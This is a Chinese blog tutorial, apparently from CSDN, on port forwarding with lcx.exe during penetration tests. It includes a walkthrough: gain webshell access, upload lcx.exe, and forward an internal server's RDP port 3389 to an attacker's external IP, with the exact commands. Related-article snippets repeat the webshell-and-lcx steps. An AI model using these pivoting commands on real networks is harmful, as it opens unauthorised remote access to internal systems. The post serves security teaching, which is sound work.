渗透测试过程中的端口转发

最新推荐文章于 2024-06-22 22:55:11 发布
最新推荐文章于 2024-06-22 22:55:11 发布
阅读量1.2k 收藏
点赞数
分类专栏: Web 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43915762/article/details/88832328
版权
先来介绍一下端口转发工具:lcx.exe

在这里插入图片描述
有三种用法:

  • -listen:监听本机的某个端口,并将其转发到本机的另一个端口。
    如:lcx.exe -listen 888 999,即监听本机的 888 端口,并将其监听到的数据转发到 999 端口。

  • -tran:将某个端口转发到本机任何一个地址的某个端口。
    如:lcx.exe -tran 8888 127.0.0.1 3389,即将本机的 3389 端口转发为本机任何一个地址的 8888 端口。这个可以在当某个服务只允许本机的 127.0.0.1 去访问时进行使用,当输入这条命令后,就可以通过 Web 服务器的 IP 地址或者 网站网址的某个端口进行连接服务,而不限于 127.0.0.1

  • -slave:将内网的某个主机的某个端口,转发到外网某个主机的某个端口上。lcx.exe -slave 外网IP 外网端口 内网IP 内网端口
    如:lcx.exe -slave 200.1.1.1 888 192.168.1.2 3389,即将局域网内 IP 地址为 192.168.1.2 的 3389 端口转发到外网 IP 为 200.1.1.1 的 888 端口上,这样就可以进行连接。

利用端口转发连接内网服务器的 3389

假设 Web 服务器的内网 IP 为 192.168.1.2。

① 先得到 webshell 权限,上传大马。

② 通过大马,上传一个 lcx.exe 端口转发工具。lcx.exe 是一个命令行工具,需要在命令行中使用。可以在大马中的命令执行界面进行执行。

③ 执行命令:
lcx.exe -slave 200.1.1.1 8888 192.168.1.2 3389
注意:

  1. 若攻击者主机是一个外网 IP,那么 200.1.1.1 处可以填写 攻击者主机的外网 IP;
  2. 若攻击者的主机是在内网中,那么 200.1.1.1 处应该写攻击者与外网相连的路由器的外网 IP 地址
  3. 若攻击者的主机是在内网中,那么 200.1.1.1 处也可以填写服务器与外网相连的路由器的外网 IP 地址,那么攻击者就可以通过连接 Web 服务器该路由器的 IP地址+转发后的端口(如 8888) 来连接服务器的 3389 端口

④ 若攻击者在内网中,且端口是转发到攻击者的内外网处的路由器的 IP 地址和端口上,那么需要配置该路由器的端口转发。即将转发到外网某个端口的数据转发到内网某 IP 地址的某个端口下。
在这里插入图片描述

⑤ 攻击者本地的主机也需要侦听:
lcx.exe -listen 1111 1311
将转发到本地 1111 端口的数据转发到 1311 上。

通过以上步骤,远程服务器的 3389 端口通过端口转发,将数据转发到了攻击者本地主机的 1111 端口;在本地侦听 1111 端口的同时,将数据又转发到了 1311 端口;那么就可以通过连接本地的 1311 端口就可以连接远程服务器。

YT--98
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 1925
在真实的错综复杂的企业环境进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
lcx端口转发实现3389远程桌面访问
weixin_45945976的博客
10-25 783
1.上传一句话php一句话: 2.菜刀连接成功以后上传lcx.exe 3.上传成功后打开虚拟终端--------写入命令 lcx.exe -slave 本机IP 自定义端口 目标IP 端口 例如:lcx.exe -slave 192.168.1.2 6666 192.168.1.250 3389 lcx -listen 6666 3388 本地自定义端口 4.监听成功,端口号为1234 ,使用127.0.0.1:1234连接 5.登录远程桌面: ...
端口转发的配置步骤及验证是否成功
qq_44802279的博客
12-11 5785
介绍了端口转发的配置过程
【内网渗透】全网最详细的端口转发教程
最新发布
TT小子的博客
06-22 1018
最近在真实环境测试和编写靶场实战教程时,总会遇到内网主机无法直接访问,需要通过转发端口、建立代理隧道等方式去访问,以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用。
渗透测试面试常用端口大全
broing55的博客
04-21 3680
0 无效端口,通常用于分析操作系统 1 传输控制协议端口服务多路开关选择器 2 管理实用程序 3 压缩进程 5 远程作业登录 7 回显 9 丢弃 11 在线用户 13 时间 17 每日引用 18 消息发送协议 19 字符发生器 20 FTP文件传输协议(默认数据口) 21 FTP文件传输协议(控制) 22 S...
渗透测试常见端口总结
2301_79977730的博客
04-09 1272
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口的攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程,网络上传输的用户和密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
ngrok端口转发应用程序
04-16
**ngrok端口转发应用程序详解** ...总之,ngrok作为一个高效的端口转发工具,其简洁的使用方式和良好的安全性使其在IT行业深受青睐。然而,正确理解和合理使用是保障安全的关键,务必谨慎处理公开暴露的服务。
渗透测试笔记.rar
02-25
4. **渗透测试技巧**:书可能涵盖了一些高级技巧,如社会工程学、密码破解、端口转发、隐蔽通信和反取证技术。这些技巧可以帮助测试者更有效地模拟攻击,发现潜在的安全漏洞。 5. **Payloads和Exploits**:在...
Android渗透测试之adb介绍与使用详解
02-04
**三、adb在渗透测试的应用** 1. **权限获取**:渗透测试人员常利用adb执行`su`命令获取设备的超级用户权限,以检查或修改系统级别的安全设置。 2. **漏洞检测**:通过adb发送自定义的系统命令或应用调用来探测...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
VulnHub靶场MONEYBOX:1
01-05
在安装过程,需要配置网络和端口转发等设置,以便在本地环境运行虚拟机并连接到靶场。 总之,VulnHub靶场MONEYBOX:1是一个非常实用的学习资源,可以帮助安全爱好者提高渗透测试和漏洞利用的技能。但是需要注意...
端口延迟检测
10-09
端口延迟检测俗称强ping 是一款检测服务器端口与延迟工具
渗透测试的常见端口
weixin_47660694的博客
12-09 542
渗透测试的常见端口
渗透测试——常见服务端口及对应的漏洞汇总
W小哥
11-17 5357
一、web服务类 tomcat--80/8080/8009 manager弱口令(漏洞利用可以上传war包getshell) put上传webshell HTTP慢速攻击 ajr文件包含漏洞-CVE-2020-1938 Jboss--8080 后台弱口令 console后台部署war包 JAVA反序列化 远程代码执行 webSphere--9080
渗透测试常见的端口
weixin_50464560的博客
07-18 1387
渗透测试常见的端口 在渗透端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,也是笔者慢慢收集起来的,分享出来大家借鉴一下,也欢迎补充 1,web类(web漏洞/敏感目录) 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix  80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreS...
渗透测试常见端口
x6693325的博客
06-09 633
Elasticsearch服务。爆破、SSH隧道及内网代理转发、文件传输。允许区域传送、DNS劫持、缓存投毒、欺骗。Zookeeper服务。Memcache服务。Linux Rexec服务。允许匿名的上传、下载、爆破和嗅探操作。Web攻击、爆破、对用服务器版本漏洞。Lotus domino邮件服务。FTP/TFTP文件传输协议。Webmin-Web控制面板。TNS爆破、注入、反弹Shell。SysBase/DB2数据库。爆破、未授权访问、远程代码执行。PostgreSQL数据库。PyAnywhere服务。
渗透测试常见的端口及其服务
weixin_39445116的博客
12-29 490
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞。9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞。在渗透端口扫描的收集主机那些服务很重要,这里收集到一些常见的的服务端,如果不知道端口服务是什么可以查找下面的内容。7001,7002 WebLogic默认弱口令,反序列。7001,7002 WebLogic默认弱口令,反序列。
ncat端口转发使用测试
weixin_60092693的博客
05-19 485
个人实验
内网渗透技术:LCX、Htran、ReDuh端口转发实验详解
"该文档是关于内网渗透的实验手册,涵盖了LCX、Htran.exe和ReDuh等工具的端口转发实验,目的是教授如何进行内网渗透测试和搭建练习环境。" 在网络安全领域,内网渗透是评估组织安全防御能力的重要环节,通常涉及到...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值